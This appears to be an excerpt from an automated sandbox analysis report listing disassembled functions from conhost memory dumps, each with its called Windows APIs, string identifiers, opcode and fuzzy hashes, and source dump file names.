                                                          • Instruction ID: eaba61874ba32c9064265aa58c7ab5254510d23f78e146824236608287e0a28a
                                                          • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction Fuzzy Hash: 0A31C432703B6586EF58DFD6E4653A963A0FB65B89F044026CE7803B66DF34C4A68700
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD3DF
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD415
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD442
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD453
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD464
                                                          • SetLastError.KERNEL32(?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CD47F
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction ID: a82f20192614bc5bd8b928fe253d302ce327c51622f0f639314a75d53b47b926
                                                          • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction Fuzzy Hash: 1D115E302476A082FB5CB3A166753BD63927B667FCF14532BD93607AF6DA38D4418201
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction ID: cdd734ac5c25bb2b168afc523aefd98578930d11bb2c10f36574dccc0fe9e3f5
                                                          • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction Fuzzy Hash: 80016171306A5582EB18DB92A4A439D63A1FF99FC4F444136DE7D43764DE3CC989C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction ID: 76c3df1580c1b1b516ae38c92b088cdaca9168a6c6e6c7f826b0425569e9a639
                                                          • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction Fuzzy Hash: D801217571375CC2EB29ABA1E82979963A0BF69B49F04042ACA7D16775EF3DC4488700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: 212a9a713a97621ced460a944e2b2f0120e0471c93ccc44a32008e31a86fb7ef
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: 7C51E3323136608ADB1CCFA5E424B983395F767B9CF5089A2DA3643798EB35C881C704
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: a7cbba46eca7e1e50a639d74c9e11893f7a944aef5d7ddb2261a91928f407243
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: CD51B032A13622ABEB5CDBA5E428B983795F370BDCF508122DA7657799DB34C842C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                          • Instruction ID: dd702e7464cf870e71e8b8ca8fe8cb42083e929ff7e8ffb04fc9267c5e82795f
                                                          • Opcode Fuzzy Hash: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                          • Instruction Fuzzy Hash: 6531E8712037A0C6E718DF91E86479D37A4F766B8CF058456EE7A437A8CB38C981C704
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction ID: 33d2f17e0c434079c8c6bd42d7ba2ff298c6bfe5ab41ce093590189175e33851
                                                          • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction Fuzzy Hash: C731E232602761A6E718DF61E86879937A4F370BCCF148016EEB6577A9CB38C942C704
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction ID: 54e4c8e26eeb472447c7b40dd291c7334073cf7e254840db2ef71c6eb90632a3
                                                          • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction Fuzzy Hash: 6CF0AF7234569592EB248FA0F5E479D6360FF69B8CF849022CAA9425B4DE7CC688DB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction ID: 59fcb1e2b9ac56b57bb401c1ab5c5b572f164ec7d71c6ee83f698a3cc4213cc2
                                                          • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction Fuzzy Hash: 98F054702067A482EB1C4B93B92419D6250FF58FC4F084022EE7607779CF3CC4868740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction ID: 411aea5d55f45ef57f2fd69d53b7a6ad95c33c6fde4d79972bacf7e3ec743744
                                                          • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction Fuzzy Hash: C2F062B131361885EF188BA5E86439D5320FF657A9F540217C67A451F4DF3DC488D300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction ID: 44e28a2a0c59aadc5f0f8363c8e6a458dce829833d0802cce118796aafd93459
                                                          • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction Fuzzy Hash: F702EF3211AB9486DB64CB95F49479AB7A0F3D5798F104116EBEE47BA8DF7CC484CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction ID: 9f8b940c8333751b98db87ba7eab5d8ae936700b65df810cc807392199f1fa23
                                                          • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction Fuzzy Hash: 1561CB3611BB54C6EB64DB95E46435A77A0F399788F50011AFAAD47BB8DB7CC540CF00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 48dfb80fe3d0d51b8649efff20ddf42be1178ebca4cc6a3bd43c4b9c8d86810e
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 7C118E32A12A7141FB6C16E9E4763ED11A1BF7837CF484636EA76076F6CB7888C94200
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 9e93c2ad1bb3061a3fc6bfa3f8b69173680c27793be08e70f518efb9e3b77ed0
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: B6117332A16B3191FABC19E8E4763ED11417B7637CF0D4637EA7A0A6FBCB7489459100
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction ID: 5153bec5762938f16cfb5b5b8ad950c760c9099c712402eac850335ad1f1ed6d
                                                          • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction Fuzzy Hash: E961AF73602B949AE728CFA5D4903DD77A0F359B8CF044256EF6A17BA9DB38C585C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 999cf6a754b1ceb4f89c1b25830423a5850f73961378d3507682051992bf0dbc
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: 7B516232103AA0CAEB688FA1946439C77D8F766B98F148617DA7987BF5CB38D451C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: b7ce5dc5f574f8830c7b0dbb7331afe685c33684bdccf4b25e1dc503635c4bfe
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: 4A51C33A9013A0E6EB788FA5D4A83A877A0F374B9CF144157DAB947BE5DB38D451CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction ID: 30a30c1b44d1bb422a00f2070cb3b0480ca21b66c8de6741ef54d9e395c14e88
                                                          • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction Fuzzy Hash: 4211AF31307B6192EB189BA5E8663DE53A0FB65788F804162DE78837B5EF38C946C744
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction ID: d19f5a44d3fd1bb76b3f02213af3c01c185202178e45e42ddf7758d730c41145
                                                          • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction Fuzzy Hash: 39D10132B06A9489E715CFE9D4603DC37B1FB68B9CF044216CE79A7BA9DA34C496C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction ID: b7e7f1b63825c9a2be8dd9ded004a13c6fd9e98d53e34b826bda65f008777a91
                                                          • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction Fuzzy Hash: 7D015E72602AA0C6DB48DFE6E85418EB7B1FF99F84F044426EA6943729DE38C091C740
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001D29E8D2D9B), ref: 000001D29E8D2ECC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001D29E8D2D9B), ref: 000001D29E8D2F57
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
